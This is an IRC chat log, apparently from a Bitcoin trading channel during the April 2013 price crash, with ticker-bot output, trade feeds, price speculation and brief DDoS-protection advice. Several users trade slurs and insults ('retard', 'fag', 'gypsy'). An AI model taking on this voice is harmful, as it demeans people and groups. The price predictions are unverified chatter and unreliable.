0.00599987 (1838086 shares, 6,413.51 BTC) Apr 12 21:55:54 the bot uses available BTC to make options Apr 12 21:56:15 thestringpuller all this rarara bitcoin is going over 590685804589 stuiff Apr 12 21:56:32 yes... so that MIGHT, MAYBE kill the options thing Apr 12 21:56:32 so don't do business with him, i think you're a self-hating gypsy Apr 12 21:56:43 It doesn't kill the exchange nor the stocks Apr 12 21:57:11 no he doesnt want to admit he's a retard, but you look more retarded trying to get him to admit it Apr 12 21:57:21 who's a retard ? Apr 12 21:57:34 I had puts... they never got rolled back. Huge profits for me... Apr 12 21:57:41 [MPEX] [S.DICE] 1990 @ 0.00369999 = 7.363 BTC [+] Apr 12 21:57:43 [MPEX] [S.DICE] 2500 @ 0.0037 = 9.25 BTC [+] Apr 12 21:57:43 not sure what Bugpowder's case is all about... Apr 12 21:57:47 [MPEX] [S.DICE] 1000 @ 0.0037333 = 3.7333 BTC [+] Apr 12 21:57:48 no one is a retard, tiberiusiv just really really acts that way Apr 12 21:57:53 [MPEX] [S.DICE] 2510 @ 0.00373331 = 9.3706 BTC [+] Apr 12 21:57:55 Namworld well he had a buy rolled. Apr 12 21:58:26 tiberiusiv: you're speculating pretty hard Apr 12 21:58:29 do you have proof? Apr 12 21:58:31 I want to see proof Apr 12 21:58:43 tiberiusiv: PROOF or shut the fuck up. Apr 12 21:58:51 no proof of mircea_popescu malice Apr 12 21:59:17 you are making extraordinary claims yet, you have no proof of the intent to deceive in the situation Apr 12 21:59:20 or intent of malic Apr 12 21:59:21 malice Apr 12 22:00:30 ? Apr 12 22:00:58 ;;ticker Apr 12 22:00:59 BTCUSD ticker | Best bid: 80.10000, Best ask: 80.89900, Bid-ask spread: 0.79900, Last trade: 80.10000, 24 hour volume: 426494.87031080, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.14199 Apr 12 22:01:49 so mircea_popescu should we not trust your 100,000 btc empire because tiberiusiv has said you are a scammer and claims to have proof of your malice? Apr 12 22:02:06 I had to sell 80 @ like 25 USD to buy a server for BitVPS. Not to start a business, just to buy some hardware... Apr 12 22:02:16 Stings when price rose to 250 weeks later Apr 12 22:02:24 I wish I could have sold then Apr 12 22:02:45 thestringpuller we should not highlight me for nonsebnse cause io'm ion like 3 convos and it just wastes my time Apr 12 22:03:26 if kakobrekla wants to mute me, then fine, but it seems you are the one without skin in the game Apr 12 22:03:40 tiberiusiv: must be EskimoBob Apr 12 22:04:46 bugpowder made 900 btc last month on calls Apr 12 22:04:48 you are a fool tiberiusiv Apr 12 22:04:56 you are making no sense Apr 12 22:05:31 I think I won about 350 BTC on options in March/April. Lost 200 in January/February tho Apr 12 22:05:37 Trying to short too much Apr 12 22:05:51 But I haven't got lots on MPEx Apr 12 22:06:20 tiberiusiv: he's had more of a magnitude of that loss, see August 2012 Apr 12 22:06:28 so like this is the 2nd time and mpex is still here? Apr 12 22:07:14 broke 86 Apr 12 22:07:18 ;;ticker Apr 12 22:07:19 BTCUSD ticker | Best bid: 82.66975, Best ask: 86.52356, Bid-ask spread: 3.85381, Last trade: 82.66975, 24 hour volume: 431290.95680419, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.14193 Apr 12 22:07:42 imminent crash? Apr 12 22:08:39 so going up kinda ? Apr 12 22:08:52 if it happened before tiberiusiv got here, like the other mpbor bond loss month, it didnt really happen Apr 12 22:10:04 actuyally there were 2 loss months Apr 12 22:10:08 one lost like 5 btc or something Apr 12 22:10:39 no that didnt happen either Apr 12 22:10:41 gypsy Apr 12 22:11:09 say, did you add my twitter to "humor" pigeons ? Apr 12 22:11:30 yeah i needed to make lists to organize Apr 12 22:11:40 you're in there with roger ver and realsolid Apr 12 22:12:01 laughing is good for health Apr 12 22:12:51 omg fag Apr 12 22:13:37 ;;ticker Apr 12 22:13:38 BTCUSD ticker | Best bid: 85.01000, Best ask: 85.20000, Bid-ask spread: 0.19000, Last trade: 85.20000, 24 hour volume: 434993.64973390, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.17972 Apr 12 22:13:46 bulls are back? Apr 12 22:14:13 ;;eightball bulls are back? Apr 12 22:14:14 Yes! Apr 12 22:15:25 hahahahahahaha Apr 12 22:15:39 lol Apr 12 22:15:45 worst might be over but it seems we've established a downward trend Apr 12 22:15:48 sweet. go gribble Apr 12 22:16:01 hmmm Apr 12 22:16:04 deon't know about that Apr 12 22:16:27 if you take now, and connect it to the 1st, or march 15th, or march 1st...its an upward trend Apr 12 22:16:48 and i think the 200 day, 50 day simple moving averages are all trending up overal Apr 12 22:16:49 there hasn't been a buying opportunity this good in weeks! as max would say Apr 12 22:17:22 why do i get the feeling pigeons and jcpham are in the same trollclub Apr 12 22:17:39 myeah, but as of now, crash isn't slowing down one bit Apr 12 22:18:15 we're not, but i did nominate to induct jcpham to my trollclub since we lost a member Apr 12 22:18:22 didn't tell him yet though Apr 12 22:18:30 the weekend brings no new funds end though perhaps there is enough sitting on the exchange that came in the past 2 days that no one wanted to put it. Apr 12 22:19:07 faek! Apr 12 22:19:11 ups Apr 12 22:19:18 scrollback Apr 12 22:19:31 lol Apr 12 22:20:18 It looks like we're losing 25 USD/BTC every 5-7 hours on average, up until now Apr 12 22:20:30 ;;ticker Apr 12 22:20:30 well so we're screwed by the 13th Apr 12 22:20:31 BTCUSD ticker | Best bid: 82.50001, Best ask: 83.00000, Bid-ask spread: 0.49999, Last trade: 83.00000, 24 hour volume: 436129.86770227, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.18694 Apr 12 22:20:37 okay there it goes Apr 12 22:20:40 ;;bc,24hprc Apr 12 22:20:41 the asks are building, the bids are lowering... Apr 12 22:20:41 81.02 Apr 12 22:20:41 you cant lose 25 an hour anymore, youd be in negative Apr 12 22:20:43 i agree regarding 200 MA... tested and held - I thought it would break... we still might retest... friday nights are historically bad for BTC... Apr 12 22:20:58 only cvause all the women are out getting drunk Apr 12 22:21:00 Every 5-7 hours... Apr 12 22:21:04 I note the 2011 correction was about 70% off and that held until gox got hacked Apr 12 22:21:11 leaves you pussies to ruin the world's greatest noncurrency Apr 12 22:21:13 not every hour... although that can't realistically keep on Apr 12 22:21:25 naemsi this is a good point. Apr 12 22:22:07 But I called the top right... Apr 12 22:22:35 the parabolic moves and corrections basically mirror each other, but in 2011 a black swan came in too. Apr 12 22:22:41 Been going well so far. I'll stick with whatever I'm doing. Apr 12 22:22:52 https://twitter.com/Mircea_Popescu/status/322791894411251712 Apr 12 22:22:53 naemsi, what are you using for charts? Apr 12 22:22:54 meanwhile Apr 12 22:23:25 joeykrim: bitcoincharts and excerpts posted on other sites Apr 12 22:23:29 wow i thought being a gypsy was bad, but that was before i heard that Namworld actually buys servers for his business, what a loser Apr 12 22:23:38 naemsi, k thx Apr 12 22:23:59 what? Apr 12 22:24:02 joeykrim: although, I haven't been able to get the custom date feature to work lately. Apr 12 22:24:15 ;;ticker Apr 12 22:24:17 BTCUSD ticker | Best bid: 80.56000, Best ask: 80.70000, Bid-ask spread: 0.14000, Last trade: 80.56000, 24 hour volume: 440061.19267461, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.17643 Apr 12 22:24:21 Servers are good =P Apr 12 22:24:28 bitcoincharts loads everything but the chart for me currently hah Apr 12 22:24:39 same for me Apr 12 22:24:44 been like that for some time Apr 12 22:25:24 volume is absoultely nuts everywhere Apr 12 22:26:21 440k Apr 12 22:26:26 if that ain't washing i dunno what is. Apr 12 22:26:38 still 82K @ btce too Apr 12 22:26:52 what would be the issues with building an exchange where run using amazon cloud services partially, for the parts that get ddos'ed? Apr 12 22:26:57 http://data.cnbc.com/quotes/MTGOXUSD Apr 12 22:27:11 what tha! Apr 12 22:27:18 boss! Apr 12 22:27:32 lol everybody joins and drops that link since rthis morning. Apr 12 22:27:45 i hadnt seen it Apr 12 22:27:52 pretty big news, really Apr 12 22:28:02 ;;bc,24hprc Apr 12 22:28:04 81.03 Apr 12 22:28:05 i still find the 0 volume funnay. Apr 12 22:28:23 bitcoin been all over the news, cnbc and bloomberg .. both are watched on big bank trading floors Apr 12 22:28:46 ;;ticker Apr 12 22:28:47 BTCUSD ticker | Best bid: 81.00000, Best ask: 81.20000, Bid-ask spread: 0.20000, Last trade: 80.70000, 24 hour volume: 440400.82873140, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.17554 Apr 12 22:30:30 cnbc price also masiively delayed Apr 12 22:32:20 ;;ticker Apr 12 22:32:20 BTCUSD ticker | Best bid: 83.10000, Best ask: 83.40000, Bid-ask spread: 0.30000, Last trade: 83.10000, 24 hour volume: 441114.24602293, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.17493 Apr 12 22:34:21 [MPEX] [S.MPOE] 17800 @ 0.00070384 = 12.5284 BTC [+] Apr 12 22:36:13 [MPEX] [S.DICE] 1000 @ 0.0037333 = 3.7333 BTC [-] Apr 12 22:36:53 ;;bc,24hprc Apr 12 22:36:54 81.03 Apr 12 22:37:43 [MPEX] [S.DICE] 2222 @ 0.00373331 = 8.2954 BTC [+] Apr 12 22:38:05 what's driving sdice up so much? Apr 12 22:38:42 kidna low yet no ? Apr 12 22:38:59 ah well sweet. my sell order went through Apr 12 22:39:00 Over 2000 btc up so far this month Apr 12 22:39:06 on SD Apr 12 22:39:33 not me, I mean SD profit Apr 12 22:40:17 I had a sell at 0.004xxxx something Apr 12 22:40:46 bought pretty low Apr 12 22:40:47 so im happy Apr 12 22:40:53 wd Apr 12 22:40:57 i thought yall said lew rockwell didnt like bitcoin? https://www.lewrockwell.com/donate/ Apr 12 22:42:20 mircea_popescu: im looking into ddos protection for havelock.. any recommendations ? Apr 12 22:42:40 i dont think we're big enough really to get a target on our back, but you can never be too prepared i suppose Apr 12 22:43:44 topace the correct way to handle this is to separate your trade engine physically, Apr 12 22:43:50 and then have people routed through webservers. Apr 12 22:44:04 if those pop you can always bring up amazon instances at the very least. Apr 12 22:44:30 have good encryptioon between trade engine and webservers - even if your users don't know gpg you do. Apr 12 22:45:12 the stupid solution is to hire somebody like blacklotus i think were probably the best in the game. Apr 12 22:45:13 and then use a dictionary admin account password Apr 12 22:45:26 and also have a huge pipe. i mean huge, 10gb dedicated + Apr 12 22:45:32 [MPEX] [S.DICE] 268 @ 0.00373331 = 1.0005 BTC [+] Apr 12 22:45:40 [MPEX] [S.DICE] 1000 @ 0.00373332 = 3.7333 BTC [+] Apr 12 22:46:23 alternatively if you're good with dns and micro routing stuff you can do your own dns scrubbing/round robining etc. Apr 12 23:08:46 [MPEX] [S.MPOE] 37191 @ 0.00070071 = 26.0601 BTC [-] Apr 12 23:08:48 [MPEX] [S.MPOE] 29000 @ 0.00069795 = 20.2406 BTC [-] Apr 12 23:08:50 [MPEX] [S.MPOE] 2909 @ 0.00069449 = 2.0203 BTC [-] Apr 12 23:09:02 [MPEX] [S.DICE] 1000 @ 0.00332445 = 3.3245 BTC [-] Apr 12 23:09:04 [MPEX] [S.DICE] 100 @ 0.00332444 = 0.3324 BTC [-] **** BEGIN LOGGING AT Fri Apr 12 23:15:16 2013 Apr 12 23:16:44 [BTCTC] [B.YABMC] 1 @ 0.015 BTC [-] Apr 12 23:17:09 !ticker m ^oix Apr 12 23:17:10 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 12 23:27:01 [BTCTC] [SYNERGY] 1 @ 0.02497 BTC [-] Apr 12 23:27:50 [BTCTC] [SYNERGY] 1 @ 0.024977 BTC [+] Apr 12 23:28:47 [BTCTC] [SYNERGY] 52 @ 0.025 = 1.3 BTC [+] Apr 12 23:29:57 [BTCTC] [SYNERGY] 10 @ 0.03 = 0.3 BTC [+] Apr 12 23:33:11 [BTCTC] [S.BBET-PT] 1 @ 0.0021 BTC [+] Apr 12 23:37:04 [MPEX] [S.BBET] 2300 @ 0.00189999 = 4.37 BTC [-] Apr 12 23:40:21 3rd CNBC story on bitcoins of the day Apr 12 23:40:51 summary? Apr 12 23:40:55 ;;seen smickles Apr 12 23:40:56 smickles was last seen in #bitcoin-assets 1 week, 1 day, 4 hours, 58 minutes, and 22 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 12 23:41:19 He on vacation? Apr 12 23:41:23 lol @bitcoinity announcement Apr 12 23:41:30 im sure mtgox has an option. Apr 12 23:41:58 Doffx afaik getting a new kid. Apr 12 23:42:16 Oh, sounds painful. Apr 12 23:43:45 kid isn't here yet Apr 12 23:43:53 too busy playing kerbal space program Apr 12 23:44:14 needs to play less kerbal space program and more replying to emails Apr 12 23:44:26 da heck is kerbal ? Apr 12 23:44:40 haha Apr 12 23:47:03 [HAVELOCK] [VTX] 5 @ 0.355 = 1.775 BTC [+] Apr 12 23:47:04 [HAVELOCK] [VTX] 1 @ 0.355 BTC [+] Apr 12 23:48:06 mircea_popescu: look it up Apr 12 23:48:10 but don't play it you might get addicted Apr 12 23:48:14 we may not see you for a few weeks Apr 12 23:48:23 im already playing poe Apr 12 23:48:41 and i don't like nonmedieval games anyway Apr 12 23:54:16 ;;ticker Apr 12 23:54:18 BTCUSD ticker | Best bid: 91.10000, Best ask: 91.78900, Bid-ask spread: 0.68900, Last trade: 91.78900, 24 hour volume: 473553.42844556, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.68381 Apr 12 23:54:24 ;;bc,24hprc Apr 12 23:54:26 81.69 Apr 12 23:55:57 [MPEX] [S.MPOE] 26600 @ 0.00070384 = 18.7221 BTC [+] Apr 12 23:58:02 [HAVELOCK] [VTX] 71 @ 0.35 = 24.85 BTC [-] Apr 13 00:01:21 http://www.reddit.com/r/Bitcoin/comments/1c7cm8/my_girlfriend_just_left_me_over_bitcoins/ Apr 13 00:01:34 sorry to hear that dub Apr 13 00:02:24 why no ama ? Apr 13 00:02:30 i wish to know your cocksize. Apr 13 00:02:55 lol, sure singlensad Apr 13 00:03:32 [BTCTC] [RSM] 1 @ 0.00111 BTC [-] Apr 13 00:03:47 [BTCTC] [GSDPT] 1 @ 0.00318 BTC [-] Apr 13 00:03:52 [BTCTC] [GSDPT] 2 @ 0.00319 = 0.0064 BTC [+] Apr 13 00:03:55 [BTCTC] [GSDPT] 10 @ 0.0032 = 0.032 BTC [+] Apr 13 00:04:05 [BTCTC] [GSDPT] 13 @ 0.00325 = 0.0423 BTC [+] Apr 13 00:04:12 [BTCTC] [GSDPT] 86 @ 0.0033 = 0.2838 BTC [+] Apr 13 00:04:16 [BTCTC] [GSDPT] 430 @ 0.0034 = 1.462 BTC [+] Apr 13 00:04:36 [BTCTC] [RSM] 15 @ 0.0011 = 0.0165 BTC [-] Apr 13 00:04:41 !ticker h HIM Apr 13 00:04:44 [HAVELOCK:HIM] 1D: 1.20000000 / 1.32116279 / 1.60000000 (43 shares, 56.81000000 BTC), 7D: 0.75000001 / 1.46159329 / 1.93000000 (283 shares, 413.63090011 BTC), 30D: 0.75000001 / 1.73321281 / 2.08000000 (812 shares, 1407.36880041 BTC) Apr 13 00:05:39 [BTCTC] [RSM] 14 @ 0.001033 = 0.0145 BTC [-] Apr 13 00:06:39 true story Apr 13 00:06:56 [BTCTC] [S.DICE-PT] 74 @ 0.00386 = 0.2856 BTC [+] Apr 13 00:07:08 [BTCTC] [S.DICE-PT] 16 @ 0.00387 = 0.0619 BTC [+] Apr 13 00:07:12 [BTCTC] [S.DICE-PT] 89 @ 0.00388 = 0.3453 BTC [+] Apr 13 00:07:14 gotta read more trilema Apr 13 00:07:16 [BTCTC] [S.DICE-PT] 62 @ 0.003999 = 0.2479 BTC [+] Apr 13 00:07:17 he'd have a gf still. Apr 13 00:07:21 [BTCTC] [S.DICE-PT] 88 @ 0.00407 = 0.3582 BTC [+] Apr 13 00:07:24 [BTCTC] [S.DICE-PT] 18 @ 0.0042 = 0.0756 BTC [+] Apr 13 00:07:42 ;;ticker Apr 13 00:07:44 BTCUSD ticker | Best bid: 87.90000, Best ask: 87.99999, Bid-ask spread: 0.09999, Last trade: 87.90000, 24 hour volume: 478680.20339326, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.74689 Apr 13 00:09:42 [BTCTC] [ASICMINER-PT] 1 @ 0.77239 BTC [+] Apr 13 00:09:51 [BTCTC] [ASICMINER-PT] 1 @ 0.77239 BTC [+] Apr 13 00:11:02 [BTCTC] [ASICMINER-PT] 8 @ 0.7724 = 6.1792 BTC [+] Apr 13 00:11:47 lol Apr 13 00:11:56 do you guys do fractional reserve? Apr 13 00:12:00 no, we do not Apr 13 00:12:19 This has significantly improved my confidence in you guys, good to hear. Apr 13 00:12:33 srsly? i don't think that they do, though its possible Apr 13 00:12:53 but who says "do you steal from me?" "no" "oh my gosh, thats great news, what a relief" Apr 13 00:13:15 forum ppl. Apr 13 00:13:27 ;;ticker Apr 13 00:13:28 BTCUSD ticker | Best bid: 89.75911, Best ask: 90.00000, Bid-ask spread: 0.24089, Last trade: 89.75911, 24 hour volume: 479489.02458761, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.75857 Apr 13 00:13:32 keeps you safe to ask Apr 13 00:14:18 originally i thought it'd be funny to follow a few domme type chicks on twitter Apr 13 00:14:22 but they're retarded omg Apr 13 00:15:07 can I get a deposit flushed, thanks Apr 13 00:15:46 ;;ticker Apr 13 00:15:48 BTCUSD ticker | Best bid: 90.97300, Best ask: 91.00000, Bid-ask spread: 0.02700, Last trade: 90.97300, 24 hour volume: 479856.71116619, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.76446 Apr 13 00:17:55 deposits flushed. Apr 13 00:18:16 Thanks mp, heading home for the weekend- that was a exciting week Apr 13 00:18:54 indeed Apr 13 00:19:35 you up and down the GDP of a small country Apr 13 00:19:39 were Apr 13 00:20:22 easy money. Apr 13 00:20:43 [BTCTC] [ASICMINER-PT] 1 @ 0.7724 BTC [+] Apr 13 00:24:46 btw, which one of you guys is Haroshi Dillemoto on twitter ? Apr 13 00:25:30 really? Apr 13 00:32:01 man, /r/bitcoin is overrun with total idiots now. Eternal September. Even bitcointalk is better. Apr 13 00:32:16 o hi there. Apr 13 00:32:55 hi Apr 13 00:33:20 nice to see a bit of an uptick on s.dice Apr 13 00:36:46 yee Apr 13 00:42:47 sup Apr 13 00:42:49 homies Apr 13 00:43:41 everyone I know is trying to buy coins right now Apr 13 00:43:52 they should be Apr 13 00:44:46 ;;bids 0 Apr 13 00:44:46 There are currently 56666625 bitcoins demanded at or over 0.0 USD, worth 13067580.3981 USD in total. | Data vintage: 108.9056 seconds Apr 13 00:44:56 no way Apr 13 00:45:00 13M? Apr 13 00:45:00 :) Apr 13 00:45:01 yeah way Apr 13 00:45:05 holy shit Apr 13 00:45:13 I'm going to go buy more Apr 13 00:45:34 There are currently 34137.06 bitcoins offered at or under 150.0 USD, worth 4141337.15248 USD in total. | Data vintage: 0.0031 seconds Apr 13 00:45:44 ;;asks 100 Apr 13 00:45:46 There are currently 4739.7457 bitcoins offered at or under 100.0 USD, worth 471525.940785 USD in total. | Data vintage: 10.1166 seconds Apr 13 00:48:31 [BTCTC] [BASIC-MINING] 1 @ 0.399 BTC [+] Apr 13 00:48:51 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Apr 13 00:49:04 watch this Apr 13 00:50:42 Pushed it to 99.90 Apr 13 00:50:46 ;;ticker Apr 13 00:50:47 BTCUSD ticker | Best bid: 99.50000, Best ask: 99.99000, Bid-ask spread: 0.49000, Last trade: 99.99000, 24 hour volume: 493362.79882472, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.11141 Apr 13 00:50:55 noice! Apr 13 00:53:21 BOOM Apr 13 00:53:26 I didn't do that one Apr 13 00:53:31 ;;ticker Apr 13 00:53:32 BTCUSD ticker | Best bid: 100.10000, Best ask: 100.22687, Bid-ask spread: 0.12687, Last trade: 100.10000, 24 hour volume: 497663.79242144, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.25673 Apr 13 00:53:34 forecasts? Apr 13 00:53:37 130 Apr 13 00:53:43 ;;bids 0 Apr 13 00:53:43 There are currently 56704246 bitcoins demanded at or over 0.0 USD, worth 13053758.3575 USD in total. | Data vintage: 79.3349 seconds Apr 13 00:54:06 130 stable or 130 and then plummet? Apr 13 00:54:29 lol Apr 13 00:54:30 who knows Apr 13 00:54:34 indeed Apr 13 00:55:05 10 people have asked me for coins today Apr 13 00:55:19 yeah everyone has been asking me to buy today too Apr 13 00:55:32 'holy shit it's down to $60! can I buy 100?' Apr 13 00:56:14 back to 200 within 14 days Apr 13 00:56:31 hopefully it will take that long. Apr 13 00:56:39 bursting as quickly as it did is terrible Apr 13 00:58:01 I just see it as a blip. The long-term hype cycle has just started. Apr 13 00:58:26 the news coverage right now is amazing Apr 13 00:58:51 106 Apr 13 00:59:25 ;;ticker Apr 13 00:59:26 BTCUSD ticker | Best bid: 102.00000, Best ask: 102.96300, Bid-ask spread: 0.96300, Last trade: 103.40000, 24 hour volume: 501238.23050075, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.39519 Apr 13 00:59:53 ;;ticker Apr 13 00:59:54 BTCUSD ticker | Best bid: 102.00000, Best ask: 102.10198, Bid-ask spread: 0.10198, Last trade: 102.00000, 24 hour volume: 501238.23050075, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.39519 Apr 13 01:01:43 ;;bids Apr 13 01:01:45 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 13 01:01:48 ;;bids 1 Apr 13 01:01:49 There are currently 754918.89 bitcoins demanded at or over 1.0 USD, worth 12939608.1286 USD in total. | Data vintage: 22.9690 seconds Apr 13 01:05:34 [MPEX] [S.MPOE] 22700 @ 0.00070384 = 15.9772 BTC [+] Apr 13 01:10:53 gox 24 hour volume 505k wow Apr 13 01:11:30 ;;goxlag Apr 13 01:11:31 MtGox lag is 64.555535 seconds. During this time, light travels 0.12936856934 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 13 01:11:46 didnt they do some upgrade Apr 13 01:13:30 ;;estimate Apr 13 01:13:31 Next difficulty estimate | 9047404.26378 based on data since last change | 9238989.55036 based on data for last three days Apr 13 01:14:17 ;;ticker Apr 13 01:14:17 BTCUSD ticker | Best bid: 101.00000, Best ask: 103.00000, Bid-ask spread: 2.00000, Last trade: 101.00000, 24 hour volume: 509067.04682345, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.69682 Apr 13 01:14:24 nice Apr 13 01:14:47 ;;bids 80 Apr 13 01:14:47 There are currently 25593.162 bitcoins demanded at or over 80.0 USD, worth 2234005.00875 USD in total. | Data vintage: 106.2894 seconds Apr 13 01:14:58 cool Apr 13 01:15:13 ;;asks 120 Apr 13 01:15:16 There are currently 16136.507 bitcoins offered at or under 120.0 USD, worth 1774675.36724 USD in total. | Data vintage: 0.0026 seconds Apr 13 01:15:24 [MPEX] [S.MPOE] 7500 @ 0.00070384 = 5.2788 BTC [+] Apr 13 01:15:26 [MPEX] [S.MPOE] 5400 @ 0.00072159 = 3.8966 BTC [+] Apr 13 01:15:27 :/ Apr 13 01:20:32 [BTCTC] [ASICMINER-PT] 1 @ 0.7698 BTC [-] Apr 13 01:20:36 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Apr 13 01:21:27 back at one hundred :) Apr 13 01:22:40 but... they told me bitcoin was dead Apr 13 01:22:49 how can it be Apr 13 01:24:01 ded chicken Apr 13 01:24:04 dead Apr 13 01:24:12 fly chickun Apr 13 01:24:22 nice price to resume from i hope everyone made it thru even or better Apr 13 01:24:31 they can move 10min without head Apr 13 01:24:34 someone wrote that in the trollbox Apr 13 01:24:38 and it has become a local meme Apr 13 01:26:24 i also hope the optobot calms back to reasonable prices soon Apr 13 01:26:28 stop buying this time when mircea_popescu tells you to Apr 13 01:26:40 stop listening to the media! Apr 13 01:26:52 ;;seen smickles Apr 13 01:26:53 smickles was last seen in #bitcoin-assets 1 week, 1 day, 6 hours, 44 minutes, and 18 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 13 01:27:16 lucif is the real hero hecalledboth the bottom and the top Apr 13 01:27:23 aww back over 100 ? Apr 13 01:27:32 sucks. i was getting all ready to bump fee to 50 Apr 13 01:27:51 do it anyway Apr 13 01:28:06 what a wonderful day to raise the fee Apr 13 01:28:09 let's do it twice! Apr 13 01:28:09 the complaints will be worth it Apr 13 01:28:13 mp will ubemad again if we hit 130? Apr 13 01:28:28 ThickAsThieves i shall smite the offenders with my mighty rod Apr 13 01:28:51 what if we ask permission? Apr 13 01:29:08 mircea may i Apr 13 01:29:16 yikes... coins selling... Apr 13 01:29:48 may the bird of happiness fly up your nose Apr 13 01:31:16 where has smickles been??? Apr 13 01:32:14 ive git a tx with 18 confsstill not showing in my havelock Apr 13 01:32:36 ;;later tell eeeCurrency https://bitcointalk.org/index.php?topic=161236.0 Apr 13 01:32:37 The operation succeeded. Apr 13 01:34:38 "Dear Investor; welcome to our interim report." Apr 13 01:34:50 usagi is reporting profits trading silver o.o Apr 13 01:35:18 where the hell is gribble's sawedoff ass at Apr 13 01:35:28 oh he here Apr 13 01:35:30 Wouldn't it be a loss? Apr 13 01:35:36 Silver went down 1.40 Apr 13 01:35:51 No worse 1.71 Apr 13 01:36:18 Great time to buy silver Apr 13 01:36:27 Doffx the only person acrtually following usagi in earnest is deprived Apr 13 01:36:33 Haha Apr 13 01:36:35 and he's not weighed in yet so dunno Apr 13 01:37:01 Wel if he reay bought when BTC was at 260 and silver was 29 he made out like a bandit Apr 13 01:37:05 even with the loss in silver Apr 13 01:37:15 Silver will hit 150+ someday Apr 13 01:38:39 o is that what he's claiming ? Apr 13 01:39:15 gold at $1476?! Apr 13 01:40:06 everything fell Apr 13 01:40:07 Thats what he said to me on IRC yes Apr 13 01:40:08 even oil fell. Apr 13 01:40:15 Namworld https://bitcointalk.org/index.php?topic=141262.0 they want you Apr 13 01:40:17 Yeah gold is a steal too Apr 13 01:40:29 i dunno, i think gold will be pushed further. Apr 13 01:40:51 if cypriot gold makes it to market, and esp if followed by portugal gold Apr 13 01:40:55 I think both silver and gold may go much lower Apr 13 01:41:01 that's like 300 tons portugal holds. Apr 13 01:41:04 However its a steal even at this current price Apr 13 01:41:21 ;;bids Apr 13 01:41:33 We broke gribble Apr 13 01:42:04 well there were 13.1M last time I checked and its still building Apr 13 01:42:16 ;;ticker Apr 13 01:42:35 ;;gribble Apr 13 01:42:36 yes I am gribble. why do you keep bothering me? Apr 13 01:42:43 haha Apr 13 01:42:51 I have never seen that one. Apr 13 01:43:09 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 13 01:43:25 [MPEX] [S.DICE] 1 @ 0.00389971 BTC [+] Apr 13 01:44:03 https://bitcointalk.org/index.php?topic=175137.0 Apr 13 01:44:08 the typical gox user emerges Apr 13 01:44:19 Anyone know if I am able to put a sell order, then a buy order, then another sell order and so on in Gox and it be smart enough to buy sell in the order I said? Apr 13 01:44:37 I have not used Gox since 2011 Apr 13 01:44:59 seems it'd sort by prices. Apr 13 01:45:01 Error: Failure to retrieve ticker. Try again later. Apr 13 01:45:05 "Since there was no real proof of any btc-e account hack, i think that you are making panic. Any account compromentation because of user`s stupidness has no relation to exchange." Apr 13 01:45:23 that's so russian Apr 13 01:46:18 totally. Apr 13 01:46:25 https://bitcointalk.org/index.php?topic=174403.0 << anyone know what this btc-e stuff is all about ? Apr 13 01:46:34 are they going under or something ? Apr 13 01:47:42 I think they recently changed it so that you can only login with your email address instead of your username, and many users apparently forgot what email they used to sign up, so... Apr 13 01:48:17 The whole 'service discussion' area is a littany of woe Apr 13 01:48:27 mircea_popescu: i love that so many contracts have been sold/written/bought etc that the interest is up sky high Apr 13 01:48:36 the bot won't price under .27 Apr 13 01:48:37 lol Apr 13 01:48:43 .28* Apr 13 01:49:09 it's just the volatility. Apr 13 01:49:22 pizzaman1337 o that's what it is ? Apr 13 01:50:02 14M Apr 13 01:50:07 !ticker m s.mpoe Apr 13 01:50:09 [MPEX:S.MPOE] 1D: 0.00067363 / 0.00069764 / 0.00073 (586629 shares, 409.26 BTC), 7D: 0.00063322 / 0.00068982 / 0.00073 (2085980 shares, 1,438.97 BTC), 30D: 0.00059218 / 0.00068862 / 0.00077505 (10252242 shares, 7,059.97 BTC) Apr 13 01:51:00 mircea_popescu: yeah, there seem to be some unhappy people here: https://btc-e.com/news/136 Apr 13 01:51:37 ;;estimate Apr 13 01:51:39 Next difficulty estimate | 9054407.82133 based on data since last change | 9287055.97634 based on data for last three days Apr 13 01:51:40 ;;bc,stats Apr 13 01:51:49 all exchanges are shit Apr 13 01:51:49 Current Blocks: 231048 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 791 blocks | Next Difficulty In About: 4 days, 15 hours, 23 minutes, and 57 seconds | Next Difficulty Estimate: 9054407.82133 | Estimated Percent Change: 18.00349 Apr 13 01:51:51 "STILL NO RESPONSE after 2 days. This support is extra lousy. Still I cannot login because I used a disposable email for registering Apr 13 01:51:51 A WARNING WOULD HAVE BEEN NICE BEFORE YOU CHANGE THE LOGIN!!!! Apr 13 01:51:51 now I cannot login the account that I own even though I got username and password!! Any support here AT all?" Apr 13 01:51:52 ouch Apr 13 01:52:55 "first, we execute. then, we gather market data and figure wtf to do about it." Apr 13 01:54:02 who else is having a case of success now? btc-e, btc24, anyone 